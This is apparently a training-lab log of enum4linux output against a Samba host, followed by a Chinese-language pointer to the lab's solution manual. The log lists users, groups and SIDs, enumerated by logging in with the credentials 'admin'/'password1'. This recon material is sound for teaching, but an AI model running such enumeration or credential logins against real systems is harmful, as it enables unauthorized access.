[+] Enumerating users using SID S-1-22-1 and logon username 'admin', password 'password1'
S-1-22-1-1000 Unix User\shawn (Local User)
S-1-22-1-1001 Unix User\jane (Local User)
S-1-22-1-1002 Unix User\nancy (Local User)
S-1-22-1-1003 Unix User\admin (Local User)
[+] Enumerating users using SID S-1-22-2 and logon username 'admin', password 'password1'
S-1-22-2-1000 Unix Group\admins (Domain Group)
S-1-22-2-1001 Unix Group\Maintainer (Domain Group)
S-1-22-2-1002 Unix Group\Reserved (Domain Group)
S-1-22-2-1003 Unix Group\Testing (Domain Group)
[+] Enumerating users using SID S-1-5-21-3690628376-3985617143-2159776750 and logon username 'admin', password 'password1'
S-1-5-21-3690628376-3985617143-2159776750-501 SAMBA-RECON-BRUTE\nobody (Local User)
S-1-5-21-3690628376-3985617143-2159776750-513 SAMBA-RECON-BRUTE\None (Domain Group)
S-1-5-21-3690628376-3985617143-2159776750-1000 SAMBA-RECON-BRUTE\shawn (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1001 SAMBA-RECON-BRUTE\jane (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1002 SAMBA-RECON-BRUTE\nancy (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1003 SAMBA-RECON-BRUTE\admin (Local User)
S-1-5-21-3690628376-3985617143-2159776750-1004 SAMBA-RECON-BRUTE\Maintainer (Domain Group)
S-1-5-21-3690628376-3985617143-2159776750-1005 SAMBA-RECON-BRUTE\Reserved (Domain Group)
S-1-5-21-3690628376-3985617143-2159776750-1006 SAMBA-RECON-BRUTE\Testing (Local Group)
enum4linux complete on Tue Oct 25 11:02:17 2022
解决方案
此实验室的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-556.pdf
